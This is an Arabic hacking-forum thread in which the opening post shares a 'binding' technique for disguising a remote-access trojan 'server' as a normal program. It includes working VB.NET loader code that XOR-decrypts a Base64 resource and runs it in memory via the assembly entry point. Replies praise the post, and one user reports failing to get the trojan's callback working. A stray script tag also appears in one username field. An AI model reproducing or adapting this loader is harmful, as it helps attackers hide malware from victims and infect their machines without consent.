حالة الموضوع:
مغلق
  1. المشاغب المغربي

    المشاغب المغربي ExpErt DeveloPer

    الأنتساب:
    ‏23 يوليو 2014
    المشاركات:
    203
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    بسم الله الرحمن الرحيم .
    السلام عليكم و رحمة الله و بركاته .
    [​IMG]

    سأقدم لكم تلغيمة بسيطة تفيد من يريد إستهداف
    يعني تخلي سيرفر هو البرنامج وسيكون كأنو مشغل البرنامج
    عادي ما فيه شيأ لشك لأننا سنزيل تتبيت في جميع لأماكن
    وسنستعمل طريقة enter point

    الكود الدي إستعملت جاهز .

    كود:
    [COLOR=DarkGreen]Module Module2
     
        Sub Main(ByVal aa As String())
            Form1.Show()
            Dim awx As Byte() = XORDecrypt(Convert.FromBase64String(My.Resources.String1), "KeyEncrypt")
            Dim ww As Object() = New Object(-1) {}
            Dim qs As System.Reflection.Assembly = AppDomain.CurrentDomain.Load(awx)
            If qs.EntryPoint.GetParameters().Length > 0 Then
                ww = New Object() {aa}
            End If
            qs.EntryPoint.Invoke(Nothing, ww)
        End Sub
        Public Function XORDecrypt(ByVal xwxw As Byte(), ByVal dcf As String) As Byte()
            Dim dcbhg As Byte() = System.Text.Encoding.ASCII.GetBytes(dcf)
            Dim fcdff As Integer = xwxw(xwxw.Length - 1) Xor 112
            Dim dfetgf(xwxw.Length) As Byte
            Dim vvvbv As Integer
            For ssdd As Integer = 0 To xwxw.Length - 1
                dfetgf(ssdd) = (xwxw(ssdd) Xor fcdff) Xor dcbhg(vvvbv)
                If vvvbv = dcf.Length - 1 Then vvvbv = 0 Else vvvbv = vvvbv + 1
            Next
            ReDim Preserve dfetgf(xwxw.Length - 2)
            Return dfetgf
        End Function
    End Module[/COLOR]


    لأن مع شرح فيديو

    إضغط على أيقونة

    [YOUTUBE]v0L6vs2rF0g[/YOUTUBE]

    أخوكم المشاغب [​IMG][​IMG]
     
    1 person likes this.
  2. iraq-bzon

    iraq-bzon Developer

    الأنتساب:
    ‏2 أغسطس 2014
    المشاركات:
    15
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: تلغيمة عن طريق Enter point قديم

    good and thanks
     
  3. sєиɪσя нσssαм

    sєиɪσя нσssαм ★ Abu Nabil ★ V • I • P

    الأنتساب:
    ‏11 يوليو 2014
    المشاركات:
    202
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    18
    الإقامة:
    فــ ـي قـ ـ لـ ـ و بــ كـم
    رد: تلغيمة عن طريق Enter point قديم

    مآشآء الله عليك يآ آيوب مبدع من يومك يآدب
    والله كم آشتقت لك ولموآضيعك حبيبى آيوب
    جآرى تقييمك + الفآيف ستآرز + آحلى لآيك
    آستمر حبيبى آيوب ولآ توقف
    فلك مستقبل كبير يآدب
    !:"
     
  4. المشاغب المغربي

    المشاغب المغربي ExpErt DeveloPer

    الأنتساب:
    ‏23 يوليو 2014
    المشاركات:
    203
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    رد: تلغيمة عن طريق Enter point قديم

    العفو أخي :*



    شكرا لك صديقي منكم نتعلم
    إن شاء الله كل خير <3

     
  5. V!P-Hero

    V!P-Hero DeveloPer Plus

    الأنتساب:
    ‏27 مارس 2012
    المشاركات:
    138
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    18
    الإقامة:
    هنااااااك
    رد: تلغيمة عن طريق Enter point قديم

    تِسلَم آيدَك آخيْ آلغآليْ عَ هذآ آلطَرحْ آلمُميزْ ~ ،،

    تحيآتيْ لَك ~
     
  6. MaDe IN K.s.A

    MaDe IN K.s.A <div class="smallfont"><script src="http://www.iq- ExpErt DeveloPer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    111
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    ksa
    رد: تلغيمة عن طريق Enter point قديم

    طرحت فآبدعت واصل يامبدع ً#ٌ5oًًًُ.
     
  7. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: تلغيمة عن طريق Enter point قديم

    عشت حبي
    بارك الله بيك
    أريد اداة استخراج الريسورس من السيرفر

     
  8. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: تلغيمة عن طريق Enter point قديم

    حبي جربت الطريقة
    بس السيرفر لا يعمل والتبليغ لا يصل
    وعندما اريد تحويل الفورم الى ميدل لا استطيع
    تخرج لي فقط الفورمم
    [​IMG]
     
  9. المشاغب المغربي

    المشاغب المغربي ExpErt DeveloPer

    الأنتساب:
    ‏23 يوليو 2014
    المشاركات:
    203
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    رد: تلغيمة عن طريق Enter point قديم


    [​IMG] تفضل

    [​IMG]
     
  10. ƁƛƬ MƛƝ

    ƁƛƬ MƛƝ V • I • P

    الأنتساب:
    ‏16 يوليو 2014
    المشاركات:
    376
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    18
    الوظيفة:
    web development
    رد: تلغيمة عن طريق Enter point قديم

    شرح رائع اخي ايوب

    مبدع بمعنى الكلمة تلغيمه رائعه

    فعلا مشاغب
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة